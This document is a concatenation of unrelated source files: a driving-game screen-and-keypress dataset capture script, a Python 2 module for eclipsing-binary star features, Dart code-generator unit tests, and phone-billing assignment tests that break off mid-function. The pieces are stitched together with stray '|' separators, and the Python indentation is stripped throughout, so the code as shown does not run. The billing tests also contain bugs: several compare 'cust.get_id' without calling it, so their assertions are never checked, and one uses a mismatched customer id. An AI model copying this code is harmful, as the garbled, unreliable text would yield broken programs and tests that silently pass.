# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
|
import cv2
import os
import time
# import matplotlib.pyplot as plt
from grabscreen import grab_screen
from getkeys import key_check
# Define keys/classes
w = [1,0,0,0,0,0,0,0,0]
s = [0,1,0,0,0,0,0,0,0]
a = [0,0,1,0,0,0,0,0,0]
d = [0,0,0,1,0,0,0,0,0]
wa = [0,0,0,0,1,0,0,0,0]
wd = [0,0,0,0,0,1,0,0,0]
sa = [0,0,0,0,0,0,1,0,0]
sd = [0,0,0,0,0,0,0,1,0]
nk = [0,0,0,0,0,0,0,0,1]
## ROI coordinates
x1 = 273
x2 = 873
y1 = 638
y2 = 1238
def keys_to_output(keys):
'''
Convert keys to a ...multi-hot... array
0 1 2 3 4 5 6 7 8
[W, S, A, D, WA, WD, SA, SD, NOKEY] boolean values.
'''
output = "empty"
if 'W' in keys and 'A' in keys:
output = "wa"
elif 'W' in keys and 'D' in keys:
output = "wd"
elif 'S' in keys and 'A' in keys:
output = "sa"
elif 'S' in keys and 'D' in keys:
output = "sd"
elif 'W' in keys:
output = "w"
elif 'S' in keys:
output = "s"
elif 'A' in keys:
output = "a"
elif 'D' in keys:
output = "d"
else:
output = "nk"
return output
# Average FPS = 56
def main():
# session log
# first sess = 0 - 9.970
# second sess = 10.000 - 86.833
# third sess = 87.000 -
idx = 87000
p = False
for i in list(range(10))[::-1]:
print(i + 1)
time.sleep(1)
print('Capturing starts.')
# ave = 0
# t1 = time.time()
while(True):
if not p:
roi = grab_screen(region = (y1, x1, y2, x2))
keys = key_check()
roi = cv2.cvtColor(roi, cv2.COLOR_BGRA2BGR)
roi = cv2.resize(roi, (224, 224))
# print(roi)
# plt.imshow(cv2.cvtColor(roi, cv2.COLOR_BGRA2RGB))
# plt.show()
class_name = keys_to_output(keys)
path = 'C:/Users/mbura/Desktop/pycrewDataset/train/'+ class_name + '/{}.jpg'.format(idx)
cv2.imwrite(path, roi)
# t2 = time.time()
# ave = t2-t1
idx += 1
# print("FPS: {}".format(idx/ave))
time.sleep(.1)
keys = key_check()
if 'T' in keys:
if p:
p = False
print('Continue capturing.')
time.sleep(1)
else:
print('Capturing is paused. ')
p = True
time.sleep(1)
main() |
#!/usr/bin/env python
"""
eclipse_features -- generate a dict of features related to
classification of eclipsing systems
in pulsational variables
is_suspect Is there a reason not to trust the orbital period measurement?
p_pulse Pulsational period (dominant period found by LS)
feature-X-ratio-diff percent of sources more than X sigma fainter than model
relative to X sigma brighter (neg has more faint values)
x = [5,8,15,20,30]
best_orb_period best period found after removing the pulsational period
suspect_reason semicolon separated list why orb_period is suspect
best_orb_chi2 best chi2 fitting orb_period from polyfit
orb_signif LS significance
"""
__author__ = "J. S. Bloom, D. Starr"
__version__ = "0.32"
import os, sys
import numpy as np
from scipy.optimize import fmin
sys.path.append(os.path.abspath(os.environ.get("TCP_DIR") + \
'Algorithms/fitcurve'))
from lomb_scargle_refine import lomb as lombr
import copy
import selectp
from matplotlib import pylab as plt
def _load_ben_data(fname="LC_246.dat"):
"""loader for Ben's input files"""
from matplotlib.mlab import csv2rec
## Get the photometry
name = str(int(fname[fname.find("_")+1:fname.find(".dat")]))
c = csv2rec(fname,delimiter=" ",names=["t","m","merr","rrl"])
x0 = c['t']
y = c['m']
dy = c['merr']
return x0,y,dy, name
def _load_dotastro_data(fname="013113-7829.1.xml"):
"""loader for dotastro xml files"""
sys.path.append(os.path.abspath(os.environ.get("TCP_DIR") + \
'Software/feature_extract/Code'))
import db_importer
b = db_importer.Source(xml_handle=fname)
kk = b.ts.keys()
ind = 0
photkey = kk[ind]
ts = b.ts
x0 = np.array(ts[photkey]['t'])
y = np.array(ts[photkey]['m'])
dy = np.array(ts[photkey]['m_err'])
name = fname.split(".xml")[0]
return x0,y,dy, name
class ebfeature:
def __init__(self,t=None, m=None, merr=None, name="", allow_plotting=True, sys_err=0.03, \
verbose=False, fix_initial_period=False, initial_period=1.0, srcid=0):
self.allow_plotting = allow_plotting
self.name = name
self.t = t ; self.m = m ; self.merr = merr ; self.sys_err = sys_err
self.verbose = verbose
self.fix_initial_period=fix_initial_period ; self.initial_period = initial_period
self.features = {"run": False}
self.srcid = srcid
def _get_pulsational_period(self,min_freq=10.0,doplot=False,max_pulse_period=400.0):
self.x0 = self.t
self.y = self.m
self.dy = self.merr
self.dy0 = np.sqrt(self.dy**2+self.sys_err**2)
self.x0 -= self.x0.min()
self.nepochs = len(self.x0)
# define the frequency grid
Xmax = self.x0.max()
if not self.fix_initial_period:
f0 = 1.0/max_pulse_period; df = 0.1/Xmax; fe = min_freq
numf = int((fe-f0)/df)
else:
f0 = 1./self.initial_period
df = 1e-7
numf = 1
psdr,res2 = lombr(self.x0,self.y,self.dy0,f0,df,numf,detrend_order=1)
period=1./res2['freq']
self.rrlp = period
if self.verbose:
print "Initial pulstional Period is %.8f day" % self.rrlp
self.features.update({"p_pulse_initial": self.rrlp})
if self.allow_plotting and doplot:
try:
plt.figure(3)
plt.cla()
tt=(self.x0/period) % 1.; s=tt.argsort()
plt.errorbar (tt,self.y,self.dy,fmt='o'); plt.plot(tt[s],res2['model'][s])
plt.ylim(self.y.max()+0.05,self.y.min()-0.05)
plt.title("P=%f" % (self.rrlp))
plt.draw()
except:
pass
return res2
def gen_outlier_stat_features(self,doplot=False,sig_features=[30,20,15,8,5],\
min_freq=10.0,dosave=True,max_pulse_period=400.0):
"""here we generate outlier features and refine the initial pulsational period
by downweighting those outliers.
"""
res2 = self._get_pulsational_period(doplot=doplot,min_freq=min_freq)
## now sigclip
offs = (self.y - res2['model'])/self.dy0
moffs = np.median(offs)
offs -= moffs
## do some feature creation ... find the statistics of major outliers
for i,s in enumerate(sig_features):
rr = (np.inf,s) if i == 0 else (sig_features[i-1],s)
tmp = (offs < rr[0]) & (offs > rr[1])
nlow = float(tmp.sum())/self.nepochs
tmp = (offs > -1*rr[0]) & (offs < -1*rr[1])
nhigh = float(tmp.sum())/self.nepochs
if self.verbose:
print "%i: low = %f high = %f feature-%i-ratio-diff = %f" % (s,nlow,nhigh,s,nhigh - nlow)
self.features.update({"feature-%i-ratio-diff" % s: (nhigh - nlow)*100.0})
tmp = np.where(abs(offs) > 4)
self.dy_orig = copy.copy(self.merr)
dy = copy.copy(self.merr)
dy[tmp] = np.sqrt(dy[tmp]**2 + res2['model_error'][tmp]**2 + (8.0*(1 - np.exp(-1.0*abs(offs[tmp])/4)))**2)
dy0 = np.sqrt(dy**2+self.sys_err**2)
#Xmax = self.x0.max()
#f0 = 1.0/max_pulse_period; df = 0.1/Xmax; fe = min_freq
#numf = int((fe-f0)/df)
#refine around original period
## Josh's original calcs, which fail for sources like: 221205
##df = 0.1/self.x0.max()
##f0 = res2['freq']*0.95
##fe = res2['freq']*1.05
##numf = int((fe-f0)/df)
df = 0.1/self.x0.max()
f0 = res2['freq']*0.95
fe = res2['freq']*1.05
numf = int((fe-f0)/df)
if numf == 0:
## Josh's original calcs, which fail for sources like: 221205
numf = 100 # kludge / fudge / magic number
df = (fe-f0) / float(numf)
psdr,res = lombr(self.x0,self.y,dy0,f0,df,numf,detrend_order=1)
period=1./res['freq']
self.features.update({"p_pulse": period})
if self.allow_plotting and doplot:
try:
tt=(self.x0*res2['freq']) % 1.; s=tt.argsort()
plt.errorbar (tt[tmp],self.y[tmp],self.dy_orig[tmp],fmt='o',c="r")
tt=(self.x0*res['freq']) % 1.; s=tt.argsort()
plt.plot(tt[s],res['model'][s],c="r")
if dosave:
plt.savefig("pulse-%s-p=%f.png" % (os.path.basename(self.name),period))
if self.verbose:
print "saved...", "pulse-%s-p=%f.png" % (os.path.basename(self.name),period)
plt.draw()
except:
pass
return offs, res2
def gen_orbital_period(self, doplot=False, sig_features=[30,20,15,8,5], min_eclipses=4,
eclipse_shorter=False, dynamic=True, choose_largest_numf=False):
"""
"""
try:
offs,res2 = self.gen_outlier_stat_features(doplot=doplot,sig_features=sig_features)
## subtract the model
new_y = self.y - res2['model']
# make new weights that penalize sources _near_ the model
dy0 = np.sqrt(self.dy_orig**2+ res2['model_error']**2 + (3*self.sys_err*np.exp(-1.0*abs(offs)/3))**2) ## this downweights data near the model
Xmax = self.x0.max()
#import pdb; pdb.set_trace()
#print
if choose_largest_numf:
f0 = min_eclipses/Xmax
df = 0.1/Xmax
fe = res2['freq']*0.98 ## dont go near fundamental freq least we find it again
numf = int((fe-f0)/df)
f0_b = res2['freq']*0.98
fe_b = 10.0
df_b = 0.1/Xmax
numf_b = int((fe_b-f0_b)/df_b)
if numf < numf_b:
f0 = f0_b
fe = fe_b
df = df_b
numf = numf_b
else:
if not eclipse_shorter:
f0 = min_eclipses/Xmax
df = 0.1/Xmax
fe = res2['freq']*0.98 ## dont go near fundamental freq least we find it again
numf = int((fe-f0)/df)
else:
f0 = res2['freq']*0.98
fe = 10.0
df = 0.1/Xmax
numf = int((fe-f0)/df)
freqin = f0 + df*np.arange(numf,dtype='float64')
periodin = 1/freqin
if self.verbose:
print "P min, max", min(periodin),max(periodin)
psdr,res2 = lombr(self.x0,new_y,self.dy0,f0,df,numf)
period=1./res2['freq']
if self.verbose:
print "orb period = %f sigf = %f" % (period,res2['signif'])
self.last_res = res2
s = selectp.selectp(self.x0, new_y, self.dy_orig, period, mults=[1.0,2.0], dynamic=dynamic, verbose=self.verbose, srcid=self.srcid)
s.select()
self.features.update({"best_orb_period": s.rez['best_period'], "best_orb_chi2": \
s.rez['best_chi2'], 'orb_signif': res2['signif']})
is_suspect = False
reason = []
if abs(1.0 - self.features['best_orb_period']) < 0.01 or abs(2.0 - self.features['best_orb_period']) < 0.01 or \
abs(0.5 - self.features['best_orb_period']) < 0.01:
## likely an alias
is_suspect=True
reason.append("alias")
if self.features['best_orb_chi2'] > 10.0 or self.features['orb_signif'] < 4:
is_suspect=True
reason.append("low significance")
if self.features['best_orb_period'] > Xmax/(2*min_eclipses):
## probably too long
is_suspect=True
reason.append("too long")
if (0.5 - abs( (self.features['best_orb_period'] / self.features['p_pulse']) % 1.0 - 0.5)) < 0.01:
## probably an alias of the pulse period
is_suspect=True
reason.append("pulse alias")
self.features.update({'is_suspect': is_suspect, 'suspect_reason': None if not is_suspect else \
"; ".join(reason)})
if doplot:
try:
plt.figure(2)
plt.cla()
s.plot_best(extra="suspect=%s %s" % (is_suspect,"" if not is_suspect else "(" + ",".join(reason) + ")"))
plt.savefig("orb-%s-p=%f-sig=%f.png" % (os.path.basename(self.name),period,res2['signif']))
if self.verbose:
print "saved...", "org-%s-p=%f.png" % (os.path.basename(self.name),period)
except:
pass
except:
return
def old_stuff(self):
print res2['chi2'], res2['chi0']
if self.verbose:
print "New Period is %.8f day" % period
plt.figure(2)
plt.cla()
tt=(self.x0/period) % 1.; s=tt.argsort()
plt.errorbar (tt[s],new_y[s],self.dy_orig[s],fmt='o',c="b")
plt.plot(tt[s],res2['model'][s],c="r")
f = open("lc.dat","w")
z = zip(tt[s] - 0.5,new_y[s],self.dy_orig[s])
for l in z:
f.write("%f %f %f\n" % l)
f.close()
f = open("lc0.dat","w")
z = zip(self.x0,new_y,self.dy_orig)
for l in z:
f.write("%f %f %f\n" % l)
f.close()
psdr,res2 = lombr(self.x0,new_y,self.dy0,f0/2.,df,numf)
period1=1./res2['freq']
if self.verbose:
print "New Period is %.8f day" % period1
plt.figure(4)
plt.cla()
tt=(self.x0/period1) % 1.; s=tt.argsort()
plt.errorbar (tt[s],new_y[s],self.dy_orig[s],fmt='o',c="b")
plt.plot(tt[s],res2['model'][s],c="r")
print res2['chi2'], res2['chi0']
f = open("lc2.dat","w")
z = zip(tt[s] - 0.5,new_y[s],self.dy_orig[s])
for l in z:
f.write("%f %f %f\n" % l)
f.close()
def runben(doplot=False):
import glob
from matplotlib.mlab import csv2rec
import numpy as np
l = glob.glob("/Users/jbloom/Dropbox/LCS/LCnew_??.dat")
if os.path.exists("benfeatures.csv"):
ttt = csv2rec("benfeatures.csv")
header=False
else:
header=True
ttt = np.rec.fromarrays([-1],names='name',formats='i4')
m = open("benfeatures.csv","a")
has_run = False
for f in l:
if f.find(".dat") != -1:
fname = f
print "working on", f
x0,y,dy, name =_load_ben_data(fname)
if len(np.where(ttt['name'] == int(os.path.basename(name)))[0]) != 0:
print "... already in list, skipping"
continue
a = ebfeature(t=x0,m=y,merr=dy,name=name)
a.gen_orbital_period(doplot=doplot)
if doplot:
plt.draw()
if not has_run:
ff = a.features.keys()
ff.remove("run")
ff.remove("p_pulse_initial")
if header:
m.write("name," + ",".join(ff) + "\n")
has_run = True
m.write(os.path.basename(name) + "," + ",".join([str(a.features.get(s)) for s in ff]) + "\n")
m.close()
def runcand(doplot=False):
import time
l = os.listdir("BenLike/")
m = open("features.csv","w")
has_run = False
for f in l:
if f.find(".xml") != -1:
fname = "BenLike/" + f
print "working on", f
x0,y,dy, name = _load_dotastro_data(fname)
a = ebfeature(t=x0,m=y,merr=dy,name=name)
a.gen_orbital_period(doplot=doplot)
if doplot:
plt.draw()
if not has_run:
ff = a.features.keys()
ff.remove("run")
ff.remove("p_pulse_initial")
m.write("name," + ",".join(ff) + "\n")
has_run = True
m.write(os.path.basename(name) + "," + ",".join([str(a.features.get(s)) for s in ff]) + "\n")
time.sleep(1)
m.close()
def test():
"""This is a test to show how to Ben's input files (t, m, merr)"""
x0,y,dy, name = _load_ben_data()
import pdb; pdb.set_trace()
print
a = ebfeature(t=x0,m=y,merr=dy,fix_initial_period=True,initial_period=0.4422664540092584,name=name)
a.gen_orbital_period(doplot=True)
print a.features
def test2():
"""This is a test to show how to use doastro xml files"""
x0,y,dy, name = _load_dotastro_data()
# note: if you already know the pulsational period, see test() above for
# ebfeature instantiation
a = ebfeature(t=x0,m=y,merr=dy,name=name)
a.gen_orbital_period(doplot=True)
print a.features
if __name__ == '__main__':
### this section is just for testing
# using t, m, merr:
test()
import pdb; pdb.set_trace()
print
### using xml file:
test2()
|
#!/usr/bin/env python3
# Copyright (c) 2012, the Dart project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
"""Tests for dartgenerator."""
import logging.config
import os.path
import re
import shutil
import tempfile
import unittest
import dartgenerator
import database
import idlnode
import idlparser
class DartGeneratorTestCase(unittest.TestCase):
def _InDatabase(self, interface_name):
return os.path.exists(
os.path.join(self._database_dir, '%s.idl' % interface_name))
def _FilePathForDartInterface(self, interface_name):
return os.path.join(self._generator._output_dir, 'src', 'interface',
'%s.dart' % interface_name)
def _InOutput(self, interface_name):
return os.path.exists(self._FilePathForDartInterface(interface_name))
def _ReadOutputFile(self, interface_name):
self.assertTrue(self._InOutput(interface_name))
file_path = self._FilePathForDartInterface(interface_name)
f = open(file_path, 'r')
content = f.read()
f.close()
return content, file_path
def _AssertOutputSansHeaderEquals(self, interface_name, expected_content):
full_actual_content, file_path = self._ReadOutputFile(interface_name)
# Remove file header comments in // or multiline /* ... */ syntax.
header_re = re.compile(r'^(\s*(//.*|/\*([^*]|\*[^/])*\*/)\s*)*')
actual_content = header_re.sub('', full_actual_content)
if expected_content != actual_content:
msg = """
FILE: %s
EXPECTED:
%s
ACTUAL:
%s
""" % (file_path, expected_content, actual_content)
self.fail(msg)
def _AssertOutputContains(self, interface_name, expected_content):
actual_content, file_path = self._ReadOutputFile(interface_name)
if expected_content not in actual_content:
msg = """
STRING: %s
Was found not in output file: %s
FILE CONTENT:
%s
""" % (expected_content, file_path, actual_content)
self.fail(msg)
def _AssertOutputDoesNotContain(self, interface_name, expected_content):
actual_content, file_path = self._ReadOutputFile(interface_name)
if expected_content in actual_content:
msg = """
STRING: %s
Was found in output file: %s
FILE CONTENT:
%s
""" % (expected_content, file_path, actual_content)
self.fail(msg)
def setUp(self):
self._working_dir = tempfile.mkdtemp()
self._output_dir = os.path.join(self._working_dir, 'output')
self._database_dir = os.path.join(self._working_dir, 'database')
self._auxiliary_dir = os.path.join(self._working_dir, 'auxiliary')
self.assertFalse(os.path.exists(self._database_dir))
# Create database and add one interface.
db = database.Database(self._database_dir)
os.mkdir(self._auxiliary_dir)
self.assertTrue(os.path.exists(self._database_dir))
content = """
module shapes {
@A1 @A2
interface Shape {
@A1 @A2 getter attribute int attr;
@A1 setter attribute int attr;
@A3 boolean op();
const long CONSTANT = 1;
getter attribute DOMString strAttr;
Shape create();
boolean compare(Shape s);
Rectangle createRectangle();
void addLine(lines::Line line);
void someDartType(File file);
void someUnidentifiedType(UnidentifiableType t);
};
};
module rectangles {
@A3
interface Rectangle : @A3 shapes::Shape {
void someTemplatedType(List<Shape> list);
};
};
module lines {
@A1
interface Line : shapes::Shape {
};
};
"""
parser = idlparser.IDLParser(idlparser.FREMONTCUT_SYNTAX)
ast = parser.parse(content)
idl_file = idlnode.IDLFile(ast)
for interface in idl_file.interfaces:
db.AddInterface(interface)
db.Save()
self.assertTrue(self._InDatabase('Shape'))
self.assertTrue(self._InDatabase('Rectangle'))
self.assertTrue(self._InDatabase('Line'))
self._database = database.Database(self._database_dir)
self._generator = dartgenerator.DartGenerator(self._auxiliary_dir,
'../templates', 'test')
def tearDown(self):
shutil.rmtree(self._database_dir)
shutil.rmtree(self._auxiliary_dir)
def testBasicGeneration(self):
# Generate all interfaces:
self._database.Load()
self._generator.Generate(self._database, self._output_dir)
self._generator.Flush()
self.assertTrue(self._InOutput('Shape'))
self.assertTrue(self._InOutput('Rectangle'))
self.assertTrue(self._InOutput('Line'))
def testFilterByAnnotations(self):
self._database.Load()
self._generator.FilterInterfaces(self._database, ['A1', 'A2'], ['A3'])
self._generator.Generate(self._database, self._output_dir)
self._generator.Flush()
# Only interfaces with (@A1 and @A2) or @A3 should be generated:
self.assertTrue(self._InOutput('Shape'))
self.assertTrue(self._InOutput('Rectangle'))
self.assertFalse(self._InOutput('Line'))
# Only members with (@A1 and @A2) or @A3 should be generated:
# TODO(sra): make th
self._AssertOutputSansHeaderEquals(
'Shape', """interface Shape {
final int attr;
bool op();
}
""")
self._AssertOutputContains('Rectangle',
'interface Rectangle extends shapes::Shape')
def testTypeRenames(self):
self._database.Load()
# Translate 'Shape' to spanish:
self._generator.RenameTypes(self._database, {'Shape': 'Forma'}, False)
self._generator.Generate(self._database, self._output_dir)
self._generator.Flush()
# Validate that all references to Shape have been converted:
self._AssertOutputContains('Forma', 'interface Forma')
self._AssertOutputContains('Forma', 'Forma create();')
self._AssertOutputContains('Forma', 'bool compare(Forma s);')
self._AssertOutputContains('Rectangle',
'interface Rectangle extends Forma')
def testQualifiedDartTypes(self):
self._database.Load()
self._generator.FilterMembersWithUnidentifiedTypes(self._database)
self._generator.Generate(self._database, self._output_dir)
self._generator.Flush()
# Verify primitive conversions are working:
self._AssertOutputContains('Shape', 'static const int CONSTANT = 1')
self._AssertOutputContains('Shape', 'final String strAttr;')
# Verify interface names are converted:
self._AssertOutputContains('Shape', 'interface Shape {')
self._AssertOutputContains('Shape', ' Shape create();')
# TODO(sra): Why is this broken? Output contains qualified type.
#self._AssertOutputContains('Shape',
# 'void addLine(Line line);')
self._AssertOutputContains('Shape', 'Rectangle createRectangle();')
# TODO(sra): Why is this broken? Output contains qualified type.
#self._AssertOutputContains('Rectangle',
# 'interface Rectangle extends Shape')
# Verify dart names are preserved:
# TODO(vsm): Re-enable when package / namespaces are enabled.
# self._AssertOutputContains('shapes', 'Shape',
# 'void someDartType(File file);')
# Verify that unidentified types are not removed:
self._AssertOutputDoesNotContain('Shape', 'someUnidentifiedType')
# Verify template conversion:
# TODO(vsm): Re-enable when core collections are supported.
# self._AssertOutputContains('rectangles', 'Rectangle',
# 'void someTemplatedType(List<Shape> list)')
if __name__ == '__main__':
logging.config.fileConfig('logging.conf')
if __name__ == '__main__':
unittest.main()
|
"""
CSC148, Winter 2019
Assignment 1
Task 1 Tests
"""
import datetime
import pytest
from typing import List, Dict, Union
from application import create_customers, process_event_history
from customer import Customer
from contract import TermContract, MTMContract, PrepaidContract
from phoneline import PhoneLine
from task1_tests import create_customers_log
phone_numbers = ['100-1200', '200-1200', '010-1020', '020-1020',
'001-1002', '002-1002', '100-2110', '010-2110',
'010-2011', '001-2011', '100-2101', '001-2101',
'100-3111', '010-3111', '001-3111']
x1 = -79.572504
x2 = -79.44713
x3 = -79.321756
y1 = 43.743916
y2 = 43.688264
y3 = 43.632611
loc = {1200: (x1, y1), 1020: (x2, y1), 1002: (x3, y1),
2110: (x1, y2), 2011: (x2, y2), 2101: (x3, y2),
3111: (x2, y3)}
def create_log() -> Dict[str, List[Dict]]:
log = {}
log['events'] = []
event = {}
dates = ["2018-11-01", "2018-12-01", "2019-01-01"]
for i in range(3):
call_number = 1
three_calls_only = ['100-1200', '001-2101', '001-3111', '001-2011']
#Term, PrePaid, PrePaid
for src_phone in phone_numbers:
num_calls = 0
max_calls = 14
dur_lst = [[], [], []]
if src_phone == '100-1200': #Term
max_calls = 3
dur_lst = [[20, 30, 40], [50, 10, 40], [50, 60, 40]]
elif src_phone == '010-1020': #MTM
for j in range(14):
dur_lst[0].append(10 * j)
dur_lst[1].append(20 * j)
dur_lst[2].append(30 * j)
elif src_phone == '001-2101': #PrePaid
max_calls = 3
dur_lst = [[169, 800, 31], [1000, 931, 69], [500, 469, 531]]
elif src_phone == '001-3111': #PrePaid
max_calls = 3
dur_lst = [[69, 11, 20], [20, 10, 20], [69, 69, 12]]
elif src_phone == '001-2011': #PrePaid
max_calls = 3
dur_lst = [[250, 50, 200], [50, 50, 900], [50, 25, 25]]
for dst_phone in phone_numbers:
if src_phone != dst_phone:
dur = 60
if (src_phone in three_calls_only) and num_calls >= max_calls:
break
elif src_phone in three_calls_only:
dur = dur_lst[i][num_calls] * 60
num_calls += 1
elif src_phone == '200-1200' or src_phone == '100-2101':
dur = 65 #Term
elif src_phone == '100-3111':
dur = 10 * 60 #Term
elif src_phone == '010-1020':
dur = dur_lst[i][num_calls] * 60 #MTM
num_calls += 1
sec = str(call_number % 60)
min = str(call_number // 60)
if len(sec) == 1:
sec = '0' + sec
if len(min) == 1:
min = '0' + min
event['type'] = 'call'
event['src_number'] = src_phone
event['dst_number'] = dst_phone
event['time'] = f'{dates[i]} 01:{min}:{sec}'
event['duration'] = dur
event['src_loc'] = loc[int(src_phone[4:])]
event['dst_loc'] = loc[int(dst_phone[4:])]
log['events'].append(event.copy())
call_number += 1
log['customers'] = create_customers_log()
return log
def create_customers(log: Dict[str, List[Dict]]) -> List[Customer]:
""" Returns a list of Customer instances for each customer from the input
dataset from the dictionary <log>.
Precondition:
- The <log> dictionary contains the input data in the correct format,
matching the expected input format described in the handout.
"""
customer_list = []
for cust in log['customers']:
customer = Customer(cust['id'])
for line in cust['lines']:
contract = None
if line['number'] == '100-1200': #Term: Test Free Min
contract = TermContract(datetime.date(2018, 11, 1), datetime.date(2019, 1, 1))
elif line['number'] == '200-1200': #Term: Test Cancel After
contract = TermContract(datetime.date(2018, 11, 1), datetime.date(2018, 12, 1))
elif line['number'] == '100-2101': #Term: Test Cancel On
contract = TermContract(datetime.date(2018, 11, 1),
datetime.date(2019, 1, 25))
elif line['number'] == '100-3111': #Term: Test Cancel Before
contract = TermContract(datetime.date(2018, 11, 1),
datetime.date(2019, 2, 1))
elif line['number'] == '001-2101': #Prepaid: positive balance
contract = PrepaidContract(datetime.date(2018, 11, 1), 25)
elif line['number'] == '001-3111': # Prepaid: negative balance
contract = PrepaidContract(datetime.date(2018, 11, 1), 25)
elif line['number'] == '001-2011': # Prepaid: mixed balance
contract = PrepaidContract(datetime.date(2018, 11, 1), 25)
elif line['contract'] == 'prepaid':
# start with $100 credit on the account
contract = PrepaidContract(datetime.date(2018, 11, 1), 100)
elif line['contract'] == 'mtm':
contract = MTMContract(datetime.date(2018, 11, 1))
elif line['contract'] == 'term':
contract = TermContract(datetime.date(2018, 11, 1),
datetime.date(2019, 6, 25))
else:
print("ERROR: unknown contract type")
line = PhoneLine(line['number'], contract)
customer.add_phone_line(line)
customer_list.append(customer)
return customer_list
def test_term_contract() -> None:
log = create_log()
customers = create_customers(log)
process_event_history(log, customers)
for cust in customers:
if cust.get_id() == 1200:
for p_line in cust._phone_lines:
if p_line.number == '100-1200': #Test Free Min
bill_summary = p_line.get_bill(11, 2018)
assert bill_summary['type'] == 'TERM'
assert bill_summary['fixed'] == 320.00
assert bill_summary['free_mins'] == 90
assert bill_summary['billed_mins'] == 0
assert bill_summary['min_rate'] == 0.1
assert bill_summary['total'] == 320
bill_summary = p_line.get_bill(12, 2018)
assert bill_summary['fixed'] == 20.00
assert bill_summary['free_mins'] == 100
assert bill_summary['billed_mins'] == 0
assert bill_summary['total'] == 20.00
bill_summary = p_line.get_bill(1, 2019)
assert bill_summary['type'] == 'TERM'
assert bill_summary['fixed'] == 20.00
assert bill_summary['free_mins'] == 100
assert bill_summary['billed_mins'] == 50
assert bill_summary['min_rate'] == 0.1
assert bill_summary['total'] == 25.00
#Test Cancel After
for line in cust._phone_lines:
if line.number == '200-1200':
assert cust.cancel_phone_line(line.number) == -280
break
elif cust.get_id() == 2101:
# Test Cancel On
for line in cust._phone_lines:
if line.number == '100-2101':
assert cust.cancel_phone_line(line.number) == 20
break
elif cust.get_id() == 3111:
# Test Cancel Before
for line in cust._phone_lines:
if line.number == '100-3111':
assert cust.cancel_phone_line(line.number) == 24
break
def test_mtm_contract() -> None:
log = create_log()
customers = create_customers(log)
process_event_history(log, customers)
for cust in customers:
if cust.get_id() == 1020:
for p_line in cust._phone_lines:
if p_line.number == '010-1020': #Test different number of cals
bill_summary = p_line.get_bill(11, 2018)
assert bill_summary['type'] == 'MTM'
assert bill_summary['billed_mins'] == 910
assert bill_summary['min_rate'] == 0.05
assert bill_summary['total'] == 95.5
bill_summary = p_line.get_bill(12, 2018)
assert bill_summary['type'] == 'MTM'
assert bill_summary['billed_mins'] == 1820
assert bill_summary['min_rate'] == 0.05
assert bill_summary['total'] == 141
bill_summary = p_line.get_bill(1, 2019)
assert bill_summary['type'] == 'MTM'
assert bill_summary['billed_mins'] == 2730
assert bill_summary['min_rate'] == 0.05
assert bill_summary['total'] == 186.5
def test_prepaid_contract() -> None:
log = create_log()
customers = create_customers(log)
process_event_history(log, customers)
for cust in customers:
if cust.get_id() == 2101:
for p_line in cust._phone_lines:
if p_line.number == '001-2101': #Test different starting balance
bill_summary = p_line.get_bill(11, 2018)
assert bill_summary['type'] == 'PREPAID'
assert bill_summary['billed_mins'] == 1000
assert bill_summary['min_rate'] == 0.025
assert bill_summary['total'] == 0
bill_summary = p_line.get_bill(12, 2018)
assert bill_summary['type'] == 'PREPAID'
assert bill_summary['billed_mins'] == 2000
assert bill_summary['min_rate'] == 0.025
assert bill_summary['total'] == 25
bill_summary = p_line.get_bill(1, 2019)
assert bill_summary['type'] == 'PREPAID'
assert bill_summary['billed_mins'] == 1500
assert bill_summary['min_rate'] == 0.025
assert bill_summary['total'] == 37.5
elif cust.get_id() == 3011:
for p_line in cust._phone_lines:
if p_line.number == '001-3111': #Test different starting balance
bill_summary = p_line.get_bill(11, 2018)
assert bill_summary['type'] == 'PREPAID'
assert bill_summary['billed_mins'] == 100
assert bill_summary['min_rate'] == 0.025
assert bill_summary['total'] == -22.5
assert bill_summary['free_mins'] == 0
bill_summary = p_line.get_bill(12, 2019)
assert bill_summary['type'] == 'PREPAID'
assert bill_summary['billed_mins'] == 50
assert bill_summary['min_rate'] == 0.025
assert bill_summary['total'] == -21.25
assert bill_summary['free_mins'] == 0
bill_summary = p_line.get_bill(1, 2019)
assert bill_summary['type'] == 'PREPAID'
assert bill_summary['billed_mins'] == 150
assert bill_summary['min_rate'] == 0.025
assert bill_summary['total'] == -17.5
assert bill_summary['free_mins'] == 0
def test_monthly_bill() -> None:
log = create_log()
customers = create_customers(log)
process_event_history(log, customers)
for cust in customers:
if cust.get_id() == 1200:
assert cust.generate_bill(11, 2018)[1] == 320 + 320
assert cust.generate_bill(12, 2018)[1] == 20 + 20
assert cust.generate_bill(1, 2019)[1] == 25 + 20
elif cust.get_id == 1020:
assert cust.generate_bill(11, 2018)[1] == 95.5 + 50.7
assert cust.generate_bill(12, 2018)[1] == 141 + 50.7
assert cust.generate_bill(1, 2019)[1] == 186.5 + 50.7
elif cust.get_id == 1002:
assert cust.generate_bill(11, 2018)[1] == 2*-99.65
assert cust.generate_bill(12, 2018)[1] == 2*-99.3
assert cust.generate_bill(1, 2019)[1] == 2*-98.95
elif cust.get_id == 2110:
assert cust.generate_bill(11, 2018)[1] == 320*2
assert cust.generate_bill(12, 2018)[1] == 20*2
assert cust.generate_bill(1, 2019)[1] == 20*2
elif cust.get_id == 2101:
assert cust.generate_bill(11, 2018)[1] == 320
assert cust.generate_bill(12, 2018)[1] == 20 + 25
assert cust.generate_bill(1, 2019)[1] == 20 + 37.5
elif cust.get_id == 2011:
assert cust.generate_bill(11, 2018)[1] == 50.7 - 12.5
